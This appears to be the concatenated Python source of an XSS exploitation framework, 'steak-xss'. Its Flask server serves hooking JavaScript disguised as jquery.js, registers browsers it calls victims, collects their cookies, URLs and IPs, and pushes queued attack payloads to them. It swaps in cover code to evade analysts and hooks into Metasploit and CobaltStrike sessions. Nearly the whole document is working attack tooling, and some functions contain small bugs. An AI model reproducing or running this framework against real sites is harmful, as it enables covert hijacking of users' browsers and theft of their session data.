from abc import abstractmethod
import importlib
from queue import Queue
from steak.utils import steak_format
from .Client import Client
from .Validator import Validator
from .Module import Module
from .Logger import Logger
import os
class Project:
    '''
    The Project is the base class for projects
    User should derive this class and implement their own project classes to tailor the attack procedure
    During the implementation, the function attack_client should be implemented
    And we also encourage our users the modify other attributes such as jsurl,fakejs_list,encoder_list and so on
    '''
    def __init__(self) -> None:
        self.logger = Logger()
        self.clients={}
        self.jsurl='/jquery.js'
        self.jslist=['jquery.js','evercookie.js','swfobject-2.2.min.js','base64.js','main.js']
        self.encoder_list=['nothing']
        self.js_payload=''
        self.stopattack=False
        self.fakejs_list=['jquery.js']
        self.project_name='default project name'
        pass

    def readjs(self,jsname):
        '''
        read js from /steak/sources/
        '''
        self.logger.debug(f'Reading Contents From ./steak/sources/{jsname}')
        try:
            jspath=os.path.join(os.path.dirname(__file__),f'../sources/{jsname}')
            return open(jspath).read()
        except FileNotFoundError:
            raise Exception(f'Javascript source file not found in {jspath}, please check your filename')
    

    def encode_js(self,content:str)->str:
        '''
        Encodes the content with provided sequence of encoders in self.encoder_list
        '''
        if isinstance(self.jslist[0],str):
            try:
                self.encoder_list=[]
                for encodername in self.encoder_list:
                    self.logger.debug(f'Loading Encoder Moudle From steak.encoders.{encodername}')
                    self.encoder_list.append(importlib.import_module('steak.encoders.{encodername}').encode)
            except ModuleNotFoundError:
                raise Exception(f'Cannot find encoder module in file:steak/encoders/{encodername}.py, please check your name')
            except AttributeError:
                raise Exception(f'Cannot find function encode in file of an attack module: steak/encoders/{encodername}.py, please check your code')
        for encodefunc in self.encoder_list:
            content=encodefunc(content)
        return content 

    def set_js_payload(self,content:str)->None:
        '''
        Encodes the content and set to js_payload cache
        '''
        self.js_payload=self.encode_js(content)    

    def generate_js(self,callbackpath:str,jsurl:str)->str:
        '''
        Check if js_payload cache exists.
        If not, it will generate js cache that is set by self.jslist and callback url
        Finally, it returns the js_payload cache
        '''
        self.logger.debug(f'Generating Payload with callbackpath:{callbackpath}')
        if not self.js_payload:
            self.set_js_payload(steak_format(';\n'.join([self.readjs(jsname) for jsname in self.jslist]),callbackpath=callbackpath,jsurl=jsurl))
        return self.js_payload

    def stop_attack(self,coverjs_list=['jquery.js'])->None:
        '''
        Stop running the project! 
        Stop ALL attacks on connected client immediately
        Replace the hooking javascript to cover js (which is a normal segments of  javascript, to hide us from analyst), by default, its jquery

        Args:
            coverjs_list: A list of javascript filenames. The function will read javascript file in steak/sources/ by filenames in coverjs_list  and return to client
        '''
        self.logger.warning(f'Stopping All Attack of Project {self.project_name}')
        Validator(coverjs_list,list)
        self.stopattack=True
        self.set_js_payload(';\n'.join([self.readjs(jsname) for jsname in coverjs_list]))
        for clientid in self.clients:
            self.clients[clientid].stop_attack()

    @abstractmethod
    def attack_client(self,client:Client)->None:
        '''
        User defined function.
        We expect that the user implements this function to define how to attack a newly connected client
        '''
        pass
    
    
    def load_module(self,modulename:str,*args,**kwargs)->Module:
        '''
        Generates a module object by its name and parameters passed in
        '''
        try:
            moduleobj=getattr(importlib.import_module(f'steak.modules.{modulename}.module'),modulename) 
        except ModuleNotFoundError:
            raise Exception(f'Can not find attack module in file:steak/modules/{modulename}/module.py, please check your name')
        except AttributeError:
            raise Exception(f'Can not find class {modulename} in file of an attack module: steak/modules/{modulename}/module.py, please check your code')

        self.logger.info(f'Loaded Moudle: {modulename}')
        return moduleobj(*args,**kwargs)
    


from steak.utils.randstring import randstring
from steak.utils import steak_format, steakformat
from .Client import Client

class Payload:
    '''
    The Payload class stores the payload string that be sent to the client,the module and taskid and client it corresponds to.
    '''
    def __init__(self,payload_str:str,module:object) -> None:
        self.module=module
        self.taskid=randstring()
        self.payload_str=steak_format(payload_str,taskid=self.taskid)
    
    def set_client(self,client:Client)->Client:
        self.client=client


from .Steak import Steak
from .Server import Server
from .Payload import Payload
from .Module import Module
from .Handler import Handler
from .Project import Project
from .Client import Client
from .Exceptions import *
from .Validator import Validator



import inspect
from .Logger import Logger
class FuncArgumentTypeError(Exception):
    '''
    Exception class whose objects to be raised when a type of a variable passed to a function does not match our expectation
    '''
    def __init__(self, funcname,expectedtype,receivedtype):
        message=f'{funcname} expects a {expectedtype} but a {receivedtype} was given.'
        logger = Logger(logger="Exceptions.py")
        logger.critical(message)
        super().__init__(message)



from .Project import Project
from .Server import Server
from .Validator import Validator
from .Logger import Logger
import importlib
from .Settings import BANNER,LOGLEVEL
import logging

class Steak:
    '''
    The Steak class is the core of the Steak(as you can see from its name)
    it gathers loaded projects together,runs all handlers background,and launch the HTTP server
    '''
    projects=[]
    
    
    def __init__(self):
        self.logger = Logger()
        self.logger.setLevel(LOGLEVEL)
        self.logger.banner(BANNER,"none")
        self.logger.info(f'Steak init')
        self.handlerlist=[]

    def add_project(self,project)->None:
        '''
        This function adds a project object passed in to the project list of this Steak object
        '''
        Validator(project,Project)
        self.projects.append(project)
        self.logger.info(f'Project {project.project_name} Loaded')

    def set_log_level(self,level):
        '''
        This function allows users to set their own log level
        You can use DEBUG INFO ERROR and so on supported by logging as its parameter
        '''
        self.logger.setLevel(getattr(logging,level))

    def run(self,ip:str,port:int,callbackpath:str="/callback",sslpem=None,sslkey=None)->None:
        '''
        This function launch a server implemented by Server class and start all handlers registered by add_handler function
        '''
        Validator(port,int)
        self.server=Server(ip,port,self.projects,callbackpath,sslpem,sslkey)
        server_thread=self.server.run_thread()
        for handler in self.handlerlist:
            handler.run_background()
        
        self.logger.info(f'Steak init finished\n\n')
        try:
            server_thread.join()
        except KeyboardInterrupt:
            self.logger.error(f'Receive KeyboardInterrupt. Steak is Exiting.')
            exit(0)

    def add_handler(self,handlername:str,*args,**kwargs):
        '''
        This function imports handler and append it to handlerlist
        '''
        handler=getattr(importlib.import_module(f'steak.handlers.{handlername}'),handlername)(*args,**kwargs)
        handler.set_steak(self)
        self.handlerlist.append(handler)
        #handler.run_background()


import random
import string

def randstring(size=10, chars=string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

def uniquerandstring(stringwealreadyhave,size=6, chars=string.ascii_uppercase + string.digits):
    s=randstring(size,chars)
    if s in stringwealreadyhave:
        return uniquerandstring(stringwealreadyhave,size,chars)
    return s


from flask import Flask,Response,request
from gevent.pywsgi import WSGIServer
import uuid
import os
import json
import traceback,sys
import queue
from steak.utils import uniquerandstring
from steak.utils import base64decode,base64encode
from .Project import Project
from .Logger import Logger
from .Client import Client
from threading import Thread
import logging

class Server:
    '''
    This class is the main server of Steak based on Flask
    It can receive information submited by victim and dispatch the information to attack_client function the victim corresponds to 
    It can also provide hooking javascript to victim and send task to victim
    '''
    def __init__(self,ip:str,port:int,projects,callbackpath:str,sslpem:str,sslkey:str) -> None:
        self.logger = Logger()
        self.ip=ip
        self.port=port
        self.sslpem=sslpem
        self.sslkey=sslkey
        self.projects=projects
        self.callbackpath=callbackpath #callback path is the path to receive information submited by victims
        self.path2callback={} # A map that maps specially registered path via register_path to its callback function
        self.jsurl2projects={} # A map that maps url of hooking javascript to the project it belongs to 
        self.clientid2client={} #A map that maps clientid to client object
        self.taskid2payloadobj={} #A map that maps taskid to payload object
        self.clientids=set() #a set of all client id
        if self.sslkey and self.sslpem:
            self.protocol='https://'
            self.isssl=1
            self.ssldict={"keyfile":self.sslkey, "certfile":self.sslpem}
        else:
            self.protocol='http://'
            self.isssl=0
            self.ssldict={}
        #As different url of hooking javascript corresponds to different project,we can not have duplicate js urls
        for project in self.projects:
            if project.jsurl in self.jsurl2projects:
                raise ValueError('js url in different projects cannot be duplicate')
            self.jsurl2projects[project.jsurl]=project
    
    def get_full_callback_path(self)->str:
        '''
        This function returns full callback path of the server
        '''
        return 'http://'+self.ip+':'+str(self.port)+self.callbackpath


    def generate_response(self,s:str)->Response:
        '''
        Generates a response who has a header Access-Control-Allow-Origin:* 
        So that victim can fetch the response in a cross domain situation
        '''
        resp=Response(s)
        resp.headers['Access-Control-Allow-Origin'] ='*'
        return resp

    def register_path(self,path:str,callback:callable)->None:
        '''
        Registers url path with a callback function
        so that other modules can register their own path and handle it and make reponse
        '''
        self.path2callback[path]=callback

    def get_clientip(self,enablexff:bool=False)->str:
        '''
        Gets client IP address
        It doesn't trsut X-Forwarded-For header unless you set enablexff True
        '''
        if enablexff:
            clientip=request.headers.getlist("X-Forwarded-For")[0]
            #check if ip valid
            if all([0<=int(i)<=255 for i in clientip.split('.')]) and len(clientip.split('.'))==4:
                return clientip
        return request.remote_addr

    def run(self):
        '''
        Generates the flask object and run it!
        Also dispatches received requests from clients to suitable tasks
        '''
        app = Flask(__name__)
        app.config['SESSION_TYPE'] = 'filesystem'

        @app.route(self.callbackpath,methods=['GET','POST'])
        def callbackpath():
            '''
            This is the function that handles requests(callbacks) submited by victims,
            when a new victim gets fucked and connects to us,we receive the client id generated by it and store it
            We expect that the client submit base64 encoded json string
            '''
            content=json.loads(base64decode(request.form.get('content'))) 
            clientid=content['clientbasicinfo']['clientid']
            project=self.jsurl2projects[content['clientbasicinfo']['jsurl']]
            dataupload=content['dataupload']
            clientip=self.get_clientip()
            if isinstance(dataupload,dict):
                dataupload['clientipaddress']=clientip
            
            if clientid not in self.clientid2client:
                '''
                A new client start to callback
                '''
                try:
                    client=Client(clientid,project,dataupload)
                    self.logger.good(f'New Client of Project {project.project_name} Connected: IP {clientip} ClientId {client.clientid}')
                except Exception as e: 
                    #Error occurs because we restarted our server so that we've forgot the victim who remembers us
                    self.logger.warning(f'Old Client Connected with Invalid ClientId with IP {clientip}. We Call it to Reconnect with New ClientId Soon.')
                    return self.generate_response('Restart') #forget me and restart !
                self.clientid2client[clientid]=client
                project.clients[clientid]=client
                #Starts a new thread to deal with the victim 
                t = Thread(target=project.attack_client, args=(client,))
                t.start()
                return self.generate_response('')
            else:
                client=self.clientid2client[clientid]
            #update client ip address
            client.ip=request.remote_addr
            '''
            "Rollback" means retrieve new task from server
            So this request means the client submits task result to us

            Taskid->Payload Object->Moudle Parse Result->Get Final Result and Return it to Project
            '''
            if dataupload!="Rollback":
                taskid=content['clientbasicinfo']['taskid']
                self.logger.info(f'Client {client.clientid} of Project {project.project_name} Finished Task {taskid}')
                payloadobj=self.taskid2payloadobj[taskid]
                result=payloadobj.module.parse_result(dataupload)
                client.taskresult[taskid]=result
                client.tasksemaphore[taskid].release() 
                del self.taskid2payloadobj[taskid]
                return self.generate_response('')
            '''
            check if there are tasks for the client. 
            If there are,send one to the clinet
            '''
            task=client.pop_latest_task()
            if task:
                self.taskid2payloadobj[task.taskid]=task
                self.logger.info(f'Sending Task {task.taskid} to Client {client.clientid} of Project {project.project_name}')
                return self.generate_response(task.payload_str)
            else:
                self.logger.debug(f'Client {client.clientid} of Project {project.project_name} Called Home')
                return self.generate_response('')
            

        @app.route('/', defaults={'path': ''},methods=['GET','POST'])
        @app.route('/<path:path>',methods=['GET','POST'])
        def handle_request(path):
            '''
            Handles all requests except callbackpaths
            First we get the current request path,and check if it is one of our specially registered path mostly used by handlers
            If it is,we call the callback function corresponds to the path and return the result
            If not,we check if the path corresponds to a hooking javascript path of a project 
            If it is,we generate js of the project and send to it 
            otherwise we return nothing to keep quiet
            '''
            path='/'+path
            #specially registered path
            if path in self.path2callback:
                callback=self.path2callback[path]
                try:
                    return str(callback(request))
                except:
                    return ''
            if path in self.jsurl2projects:
                project=self.jsurl2projects[path]
            else:
                return ''
            resp=Response(project.generate_js(self.get_full_callback_path(),project.jsurl))
            resp.headers['Content-Type'] = 'text/javascript;charset=UTF-8'
            return resp
        
        if self.logger.getLevel==logging.DEBUG:
            gevent_server = WSGIServer((self.ip, self.port), app,**self.ssldict)
        else:
            gevent_server = WSGIServer((self.ip, self.port), app,log = None, **self.ssldict)

        self.logger.info(f'Running the Steak Server at {self.protocol}{self.ip}:{self.port}/')
        gevent_server.serve_forever()
        
    
    def run_thread(self):
        '''
        Start a server thread
        '''
        t = Thread(target=self.run)
        t.setDaemon(True)
        t.start()
        return t


from pymetasploit3.msfrpc import MsfRpcClient
from steak.core.Handler import Handler
import time


class MetasploitHandler(Handler):
    def __init__(self,password:str,port=55552,ssl=False) -> None:
        super().__init__()
        self.client = MsfRpcClient(password, port=port,ssl=False)
        

    def generate_event(self):
        '''
        Polls the msf server via msfrpc, returns when number of msf sessions increases.
        '''
        last_sessions=self.client.sessions.list
        while True:
            time.sleep(1)
            if len(self.client.sessions.list)>len(last_sessions):
                return self.client.sessions.list
            
    


from .Payload import Payload
from steak.utils import steak_format
from .Logger import Logger
import os
class Module:
    '''
    The Module class is the base class for attack modules
    Users can derive this class and build their own attack modules.
    '''
    def __init__(self,**kwargs) -> None:
        self.logger = Logger()
        try:
            self.logger.debug(f'Reading Moudle javascript from steak/modules/{self.__class__.__name__}/command.js')
            jspath=os.path.join(os.path.dirname(__file__),f'../modules/{self.__class__.__name__}/command.js')
            self.jstemplate=open(jspath).read()
        except FileNotFoundError:
            raise Exception(f'Javascript source file not found in {jspath}, we expect you to place one there')
        self.kwargs=kwargs
        self.jspayload=steak_format(self.jstemplate,**self.kwargs)
        self.payload=self.get_jspayload()

    
    def get_jspayload(self)->Payload:
        '''
        Constructs a Payload object that is to be sent to user
        '''
        return Payload(self.jspayload,self)
    
    def parse_result(self,result):
        '''
        Parses the result submited by the client
        Users can implement their own parse_result function to extract information they need
        '''
        return result


from .Exceptions import FuncArgumentTypeError
import inspect

def Validator(objectin:object,expectedtype:object)->None:
    '''
    This function should be called inside another function to check if an object matches the expected type
    If not, it raise an FuncArgumentTypeError exception
    '''
    if isinstance(objectin,expectedtype):
        return
    else:
        funcname=inspect.stack()[1][3]
        expectedtype=expectedtype
        receivedtype=type(objectin)
        raise FuncArgumentTypeError(funcname,expectedtype,receivedtype)


def steak_format(content_to_be_formated,**kwargs):
    '''
    our special way to format string
    
    >>>steakformat("A<steak>test</steak>",test=123)
    'A<steak>123</steak>'
    '''
    for key in kwargs:
        content_to_be_formated=content_to_be_formated.replace(f"<steak>{str(key)}</steak>",str(kwargs[key]))
    return content_to_be_formated


from queue import Queue
from pymetasploit3.msfrpc import MsfRpcClient
from steak.core.Handler import Handler
import copy
import time
import threading



class CobaltStrikeHandler(Handler):
    '''
    This is an implementation of a handler that recevies online event of CobaltStrike victim.
    Due to the fucking complexity of the protocol of CobaltStrike, we register a path to the Server class to receive information pushed by CobaltStrike server
    To use this handler, you need to deploy the cobaltstrike.cna in CobaltStrike Server and make sure they have identical "password" and the serverurl in the cna script is same to the one we registerd
    '''
    def callback_registedpath(self,request):
        '''
        Receives information pushed by CobaltStrike server
        if the password received is identical to the self.password, it set the onlineinfo in
        '''
        if request.form.get('password')==self.password:
            self.onlineinfo.put({'ip':request.form.get('ip'),'computername':request.form.get('computername'),'username':request.form.get('username')})
        return ''

    def __init__(self,listenonpath='/cobaltstrikecallback',password='demo') -> None:
        super().__init__()
        self.onlineinfo=Queue()
        self.lisenonpath=listenonpath
        self.password=password
        self.init=False

    def generate_event(self):
        if self.init==False:
            self.steak.server.register_path(self.lisenonpath,self.callback_registedpath)
            self.init=True
        return self.onlineinfo.get()
        
            
    


import logging
from colorama import Fore, Style
import sys

class Logger(object):
    def __init__(self):
        self.logger = logging.getLogger(name="Steak")
        
        if not self.logger.handlers:
            ch = logging.StreamHandler(sys.stdout)
            ch.setLevel(logging.DEBUG)
            self.logger.addHandler(ch)

    def type2symbol(self, typein):
        type2symbol_dict = {'normal': '[*] ',
            'bad': '[-] ', 'good': '[+] ', 'none': ''}

        return type2symbol_dict.get(typein, "[*] ")

    def setLevel(self,level):
        self.logger.setLevel(level)

    def getLevel(self):
        return self.logger.level

    def debug(self, msg, typein="normal"):
        self.logger.debug(Fore.WHITE + self.type2symbol(typein) +
                          str(msg) + Style.RESET_ALL)

    def info(self, msg, typein="normal"):
        self.logger.info(Fore.GREEN + self.type2symbol(typein) +
                         str(msg) + Style.RESET_ALL)

    def good(self, msg, typein="good"):
        self.logger.info(Fore.MAGENTA + self.type2symbol(typein) +
                         str(msg) + Style.RESET_ALL)

    def banner(self, msg, typein="none"):
        self.logger.info(Fore.YELLOW + self.type2symbol(typein) + str(msg) + Style.RESET_ALL)
        
    def warning(self, msg, typein="bad"):
        self.logger.warning(Fore.RED + self.type2symbol(typein) + str(msg) + Style.RESET_ALL)
        
    def error(self, msg, typein="bad"):
        self.logger.error(Fore.RED + self.type2symbol(typein) + str(msg) + Style.RESET_ALL)
        
    def critical(self, msg, typein="normal"):
        self.logger.critical(Fore.RED + self.type2symbol(typein) + str(msg) + Style.RESET_ALL)



import json
from queue import Queue
import time
import threading 
from .Logger import Logger
from threading import Thread

class Client:
    '''
    Client class for victims.
    Every client has its own client object owned by a project
    In every client object, there is a unique clientid and its own taskqueue
    '''
    def __init__(self,clientid,project,clientinfo) -> None:
        self.clientid=clientid
        self.project=project
        self.useragent=clientinfo['useragent']
        self.curdomaincookies=clientinfo['curdomaincookies']
        self.cururl=clientinfo['cururl']
        self.ip=clientinfo['clientipaddress']
        self.taskqueue=Queue()
        self.stopattack=False
        self.taskresult={}
        self.tasksemaphore={}
        self.logger = Logger()

    def pop_latest_task(self):
        '''
        Pops the latest task from task queue of this victim
        If there are no tasks, it returns None
        '''
        try:
            return self.taskqueue.get(False)
        except:
            return None

    def stop_attack(self):
        '''
        Stops attacks on this client immediately
        This function clears task queue and set stopattack=True to prevent further attacks
        '''
        self.logger.warning(f'Stop All Attack on Client {self.clientid}')
        self.stopattack=True
        self.taskqueue=Queue()

    
    def send_payload(self,moduleobj:object,callback:callable=None):
        '''
        Receives an attack module object and send the payload to the client
        By default, this function waits for the result of execution and returns the result
        If an callback parameter is a callable function was passed in, it starts a new thread to pass result of execution and pass it to callback function and returns taskid
        If the callback parameter is not callable, it simply send the payload to the client and return the taskid (so that when you want to send a payload asynchronously, you don't have to create a useless function to be passed in)
        '''
        self.logger.debug(f'Sending Payload to Client {self.clientid}')
        if self.stopattack:
            raise Exception("Attack on this client should be stopped")
        payload=moduleobj.payload
        payload.set_client(self)
        taskid=payload.taskid
        semaphore=threading.Semaphore(0)
        self.tasksemaphore[taskid]=semaphore
        self.taskqueue.put(payload)
        if not callback:
            semaphore.acquire()
            return self.taskresult[taskid] 
        elif callable(callback):
            def thread_callback():
                semaphore.acquire()
                callback(self,self.taskresult[taskid] )
            t = Thread(target=thread_callback)
            t.setDaemon(True)
            t.start()
        return taskid
    
    def get_taskresult(self,taskid:str):
        '''
        Gets task result from a specified taskid.
        If there is no result, it returns None
        '''
        if taskid in self.taskresult:
            return self.taskresult[taskid] 
        return None


from abc import abstractmethod
from threading import Thread
from .Logger import Logger

class Handler:
    '''
    The Handler class is the base class for external event handler.
    Users can derive this class to receive external events they care e.g. an online signal in CobaltStrike 
    Users should at least implement generate_event function to implement this class
    '''
    def __init__(self,callbackname=None) -> None:
        self.logger = Logger()
        if callbackname:
            self.callbackname=callbackname
        else:
            self.callbackname="on_"+self.__class__.__name__.lower()

    def set_steak(self,steakobj)->str:
        self.steak=steakobj

    def get_callback_name(self)->str:
        return self.callbackname

    @abstractmethod
    def generate_event(self):
        '''
        Generates a single external event
        This function should be implemented by user and it should return only when an external event happened
        '''
        pass

    def run(self)->None:
        '''
        Continously calls the generate_event function to obtain an external event and calls callback functions corresponding to this handler in all projects
        '''
        while True:
            self.logger.debug(f'{self.__class__.__name__} is Waiting for Events')
            event=self.generate_event()
            self.logger.info(f'An external event of {self.__class__.__name__} occured')
            for project in self.steak.projects:
                try:
                    method=getattr(project, self.callbackname)
                    #method(event)
                    #_thread.start_new_thread( method, (event,))
                    t = Thread(target=method,args=(event,))
                    t.setDaemon(True)
                    t.start()
                except:
                    continue
    
    def run_background(self)->None:
        '''
        Runs the self.run function in a new thread
        '''
        #self.logger.info('[*]Handler running background...')
        #_thread.start_new_thread( self.run, tuple())
        t = Thread(target=self.run)
        t.setDaemon(True)
        t.start()
        self.logger.info(f'Handler {self.__class__.__name__} Loaded')




from setuptools import setup, find_packages

with open("README.md", "r") as fh:
    long_description = fh.read()

setup(
    name = "steak-xss",
    version = "0.2.3",
    keywords = ["steak", "xss","steak-xss"],
    description = "An advanced XSS exploitation tool",
    long_description=long_description,
    long_description_content_type="text/markdown",
    license = "MIT",
    url = "https://github.com/LoveSteak/Steak",
    author = "LoveSteak",
    author_email = "hiramscu@163.com",

    packages = find_packages(),
    include_package_data = True,
    platforms = "any",
    install_requires = [
        "Flask>=1.1.2",
        "pymetasploit3>=1.0.3",
        "colorama>=0.4.4",
        "gevent>=21.1.2"
    ]
)


from steak.core.Module import Module

class Consolelog(Module):
    '''
    A simple demo module that make a console log to the user
    '''
    def __init__(self,**kwargs) -> None:
        super().__init__(**kwargs)